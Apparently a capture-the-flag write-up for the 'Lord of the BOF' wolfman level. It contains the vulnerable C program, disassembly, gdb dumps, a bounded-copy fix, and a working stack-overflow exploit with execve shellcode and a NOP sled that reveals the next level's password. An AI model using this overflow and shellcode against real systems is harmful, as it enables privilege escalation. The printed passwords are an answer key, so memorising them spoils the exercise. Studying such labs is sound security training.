1. intro
2. Code and analysis
2.1 C code
/*
    The Lord of the BOF : The Fellowship of the BOF
    - wolfman
    - egghunter + buffer hunter
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, memset, strcpy */

extern char **environ;

int main(int argc, char *argv[])
{
    char buffer[40];
    int i;

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    // egghunter: wipe every environment string so nothing can be staged there
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));

    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }

    // unbounded copy: an argv[1] longer than 40 bytes overflows buffer (the intended bug)
    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    // buffer hunter: wipe the 40-byte buffer after use
    memset(buffer, 0, 40);
    return 0;
}
2.3. Analysis
2.3.1. Assembler code (key part)
Same as the previous level, but the following was added:
0x80485d6 <main+214>: push $0x28
0x80485d8 <main+216>: push $0x0
0x80485da <main+218>: lea 0xffffffd8(%ebp),%eax
0x80485dd <main+221>: push %eax
0x80485de <main+222>: call 0x8048430 <memset>
This part zeroes the buffer region (memset(buffer, 0, 0x28)).
3. Vulnerability check and attack preparation
3.1 Vulnerability
Same as the previous level.
This time, however, the return address must start with 0xbf, so the stack has to be used, yet the buffer variable is zeroed.
3.2 Attack preparation
Since the environment variables and the buffer variable are zeroed, those regions cannot be used.
However, as in the previous attacks, the region after the return address can still be used.
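The memset at the end of main wipes only the 40 bytes of buffer, after strcpy has already written past it, so the saved return address and everything above it are untouched by the wipe. Here is an added example (not the wargame's code) of the length check that actually closes the hole; copy_arg_checked, wolfman_hardened, run_with_arg and LONG_ARG are hypothetical names, and LONG_ARG is a constructed 48-byte input.

```c
#include <stdio.h>
#include <string.h>
#define BUF_SIZE 40

/* Constructed 48-byte input: long enough to pass wolfman's argv[1][47] check
 * and, with strcpy, to reach the saved return address. */
static const char LONG_ARG[] = "AAAAAAAAAAAA" "AAAAAAAAAAAA" "AAAAAAAAAAAA" "AAAAAAAAAAAA";
static char scratch[BUF_SIZE];   /* destination used by the checks below */

/* Hypothetical replacement for strcpy(buffer, argv[1]): copy only if src
 * fits together with its NUL. Returns the length copied, or -1. */
int copy_arg_checked(char *dst, size_t dst_size, const char *src)
{
    size_t len = strlen(src);
    if (len >= dst_size)          /* would overflow, or leave no room for NUL */
        return -1;
    memcpy(dst, src, len + 1);
    return (int)len;
}

/* Same flow as wolfman's main (argument check, copy, print, wipe) with the
 * bounded copy. Returns 0 on success, 1 if the argument is missing/too long. */
int wolfman_hardened(int argc, char *argv[])
{
    char buffer[BUF_SIZE];
    if (argc < 2) {
        printf("argv error\n");
        return 1;
    }
    if (copy_arg_checked(buffer, sizeof buffer, argv[1]) < 0) {
        printf("argument too long (max %zu bytes)\n", sizeof buffer - 1);
        return 1;
    }
    printf("%s\n", buffer);
    memset(buffer, 0, sizeof buffer); /* hygiene only; the check above is the fix */
    return 0;
}

/* Runs wolfman_hardened with a single constructed argument. */
int run_with_arg(const char *arg)
{
    char *argv[] = { "wolfman", (char *)arg, NULL };
    return wolfman_hardened(2, argv);
}

int main(int argc, char *argv[])
{
    return wolfman_hardened(argc, argv);
}
```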
(gdb) r `python -c 'print "A"*0x2c + "\xbf\xbf\xbf\xbf" + "B"*100'`
Starting program: /home/orc/wolfmaa `python -c 'print "A"*0x2c + "\xbf\xbf\xbf\xbf" + "B"*100'`
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA¿¿¿¿BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB
Breakpoint 2, 0x80485e6 in main ()
(gdb) x/40x $esp
0xbffffa5c: 0x00000016 0x00000000 0x00000000 0x00000000
0xbffffa6c: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffa7c: 0x00000000 0x00000000 0x00000000 0x41414141
0xbffffa8c: 0xbfbfbfbf 0x42424242 0x42424242 0x42424242
0xbffffa9c: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffaac: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffabc: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffacc: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffadc: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffaec: 0x42424242 0x42424242 0xbffffc00 0xbffffea8
4. exploit
Attacking based on the above gives the following.
[orc@localhost orc]$ ./wolfmaa `python -c 'print "\x90"*0x2c + "\x9c\xfa\xff\xbf" + "\x90"*0x20 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
1hpassh/my-h/bin
㱍
Segmentation fault (core dumped)
[orc@localhost orc]$ gdb -c core
GNU gdb 19991004
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-redhat-linux".
Core was generated by `./wolfmaa '.
Program terminated with signal 11, Segmentation fault.
#0 0xbffffabf in ?? ()
(gdb) x/40x 0xbffffabf - 100
0xbffffa5b: 0x05d920ff 0x0143e040 0xfffa7c40 0x066070bf
0xbffffa6b: 0x10698040 0x00ae6040 0xfffb0440 0xfffab8bf
0xbffffa7b: 0x0485e3bf 0xfffa9008 0x000000bf 0x00002800
0xbffffa8b: 0x00001700 0x0000e000 0x00000000 0x00000000
0xbffffa9b: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffaab: 0x00000000 0x00000000 0x00000000 0x90909000
0xbffffabb: 0x00028290 0x90909000 0x90909090 0x90909090
0xbffffacb: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffadb: 0x90909090 0x89c03190 0x50c189c2 0x73617068
0xbffffaeb: 0x6d2f6873 0x2f682d79 0x896e6962 0xcd0bb0e3
(gdb) q
[orc@localhost orc]$ ./wolfmaa `python -c 'print "\x90"*0x2c + "\xcb\xfa\xff\xbf" + "\x90"*0x20 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
̺ÿ¿1hpassh/my-h/bin
㱍
euid = 504
cantata
[orc@localhost orc]$ ./wolfman `python -c 'print "\x90"*0x2c + "\xcb\xfa\xff\xbf" + "\x90"*0x20 + "\x31\xc0\x89\xc2\x89\xc1\x50\x68\x70\x61\x73\x73\x68\x2f\x6d\x79\x2d\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"'`
̺ÿ¿1hpassh/my-h/bin
㱍
euid = 505
love eyuna